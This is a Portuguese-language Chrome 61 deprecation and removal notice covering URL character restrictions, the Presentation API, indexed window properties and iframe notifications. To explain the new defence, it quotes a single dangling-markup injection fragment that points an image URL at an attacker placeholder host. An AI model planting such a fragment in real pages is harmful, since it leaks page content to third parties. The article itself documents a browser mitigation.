Em quase todas as versões do Chrome, vemos um número significativo de atualizações e melhorias no produto, no desempenho dele e também nos recursos da plataforma da Web. Neste artigo, descrevemos as descontinuações e remoções do Chrome 61, que está na versão Beta desde 3 de agosto. Essa lista está sujeita a alterações a qualquer momento.
Segurança e privacidade
Bloquear recursos com URLs que contêm os caracteres "\n" e "<"
Há um tipo de invasão chamado injeção de marcação de atraso, em que um
URL truncado é usado para enviar dados a um endpoint externo. Por exemplo,
considere uma página que contém <img src='https://evil.com/?
. Como o URL não tem aspas de fechamento, os navegadores lerão a próxima citação que ocorrer e tratarão os caracteres incluídos como se fosse um único URL.
O Chrome 61 reduz essa vulnerabilidade restringindo os conjuntos de caracteres
permitidos nos atributos href
e src
. Especificamente, o Chrome vai interromper
o processamento de URLs quando encontrar caracteres de nova linha (\n
) e menos que
caracteres (<
).
Os desenvolvedores com um caso de uso legítimo para uma nova linha e menos de caracteres em um URL precisam fazer o escape desses caracteres.
Intenção de remover | Rastreador de status do Chrome | Bug do Chromium
Suspensão e remoção da API Apresentação em contextos não seguros
Em origens não seguras, a API Apresentação pode ser usada como um vetor de invasão em origens não seguras. Como as telas não têm barras de endereço, a API pode ser usada para falsificar o conteúdo. Também é possível exfiltrar dados de apresentações em execução.
Para cumprir a intenção do Blink de remover recursos avançados em origens não seguras (link em inglês), planejamos descontinuar e
remover o suporte à API Apresentação em contextos não seguros. A partir do Chrome
61, PresentationRequest.start()
não funcionará mais em origens não seguras.
Intenção de remover | Rastreador de status do Chrome | Bug do Chromium
JavaScript
Não permitir a definição de propriedades indexadas em janelas
Antes, alguns navegadores permitiam atribuições de JavaScript, como as seguintes:
window[0] = 1;
As especificações atuais de HTML informam que essa é uma violação explícita da especificação do JavaScript. Sendo assim, esse recurso é removido no Chrome 61. Desde fevereiro de 2016, o Firefox já está em conformidade.
Remoção do uso de notificações de iframes não seguros
As solicitações de permissão de iframes podem confundir os usuários, porque é difícil distinguir entre a origem da página que contém e a do iframe que está fazendo a solicitação. Quando o escopo das solicitações não é claro, é difícil para os usuários julgarem se vão conceder ou negar a permissão.
Isso também vai alinhar os requisitos de permissão de notificações com os de notificações push, facilitando o atrito para os desenvolvedores.
Os desenvolvedores que precisam dessa funcionalidade podem abrir uma nova janela para solicitar permissão de notificação.
Intenção de remover | Rastreador de status do Chrome | Bug do Chromium